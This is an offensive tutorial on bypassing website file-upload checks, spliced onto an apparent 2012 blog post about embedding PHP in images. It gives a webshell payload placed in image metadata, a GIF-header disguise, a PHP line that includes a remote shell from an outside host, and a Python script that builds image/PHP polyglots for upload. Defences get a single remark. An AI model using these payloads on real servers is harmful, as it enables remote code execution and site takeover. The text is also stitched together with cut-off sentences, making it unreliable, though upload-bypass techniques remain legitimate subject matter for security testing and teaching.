File upload bypass
File upload mechanisms are very common on websites, but sometimes have poor validation. This allows attackers to upload malicious files to the web server, which can then be executed by other users or the server itself. This can also happen in authenticated areas of a website (e.g. installing WordPress plugins)
Developers may blacklist specific file extensions and prevent users from uploading files with extensions that are considered dangerous. This can be bypassed by using alternate extensions or even unrelated ones. For example, it might be possible to upload and execute a
.php file simply by renaming it
|php||phtml, .php, .php3, .php4, .php5, and .inc|
|perl||.pl, .pm, .cgi, .lib|
|jsp||.jsp, .jspx, .jsw, .jsv, and .jspf|
|Coldfusion||.cfm, .cfml, .cfc, .dbm|
Blacklisting MIME types is also a method of file upload validation. It may be bypassed by intercepting the POST request on the way to the server and modifying the MIME type.
Normal php MIME type:
For file uploads which validate image size using php
getimagesize(), it may be possible to execute shellcode by inserting it into the Comment attribute of Image properties and saving it as
You can do this with gimp or exiftools:
exiftool -Comment='<?php echo “<pre>”; system($_GET[‘cmd’]); ?>’ file.jpg
mv file.jpg file.php.jpg
I’m not sure why some tutorials have the php extension first while others have it second. Try both.
GIF89a is a GIF file header. If uploaded content is being scanned, sometimes the check can be fooled by putting this header item at the top of shellcode:
system($_GET[‘cmd’]); # shellcode goes here
last two posts about Malicious PHP Code In The Form of An Image, I only talked about uploading PHP as image files and how websites can be vulnerable to hacking. However in this post I’m going to talk about how to inject PHP code in to a valid image file.
Because malicious PHP code can be uploaded for a website as a JPG or GIf file through insecure upload forms, most upload forms don’t check the file extension, but check the content of the file, or check the content of the file and the extension. In that kind of situations a PHP code cannot be uploaded as a image file.
Let’s say there is a upload form that doesn’t check the file extension but checks the contents of the file. It’s secure than just checking the extension of the file. So a hacker can overcome this by injecting malicious PHP code to a valid image file, and upload it as PHP. Which I’m going to talk about now.
There are few ways to add PHP code to a image file, one way is to add the PHP code to the EXITE meta data of the image by simply downloading an EXIF editor, or using a software like GIMP to add the php code to the comment section of the image, or using a HEX editor.
But, there is more simpler way to do it. First make a simple white GIF file, JPG will do too. Make sure it’s white, I’ve used other images but sometimes it give errors in PHP because of the characters of the image code.
Make a small PHP file, make sure the code is small because sometimes it might give a PHP error too if it’s too long because we are injecting this to a valid image file, this code will do.
<?php include ("http://example.com/shell.php"); ?>
Save this as a PHP file.
Then make this small piece of python code,
lavender = open ('msgif.gif','rb').read() lavender += open ('test.php','rb').read() open ('newphp.php','wb').write(lavender)
Run the python script and the PHP the end result will be a valid image file with malicious PHP code in it, with PHP extension.
And you can upload this to a an upload form that check the contents of an file and not the extension of the file. These forms most of the time check the header of the file (sometimes the header and the width of and height of the image) and does not check the extension because checking the contents of the file is better than just checking the extension and because of this the file can be uploaded as a PHP file. And typing the URL of of the file will execute the PHP code and leaving out the JPG or GIF code. The remote shell will be called and because PHP code executes on the server the remote shell will be executed on the server that has the malicious image.
For upload forms that check both the extension and the content of the file, the malicious image that we made can be renamed as GIF or JPG and can be uploaded to the website, and it can be executed just like a PHP file with an image extension like I talked in my previous 2 posts.
Sometimes websites check for the size of the image with the PHP get image size function, so the if the image is too small it will be not allowed to be uploaded. But if we make a bigger white image it will most probably allow the file to be uploaded.
This can be overcome by forms by not just uploading the file, but recreating image on the server using PHP create image function, or removing the metadata of the image before uploading as well.
I think this brings a wrap to injection malicious PHP code to an image, I’ll write a post if I have anything more to add.
Posted 18th July 2012 by Unknown
Labels: Hacking Infosec Malicious PHP In Images Malware PHP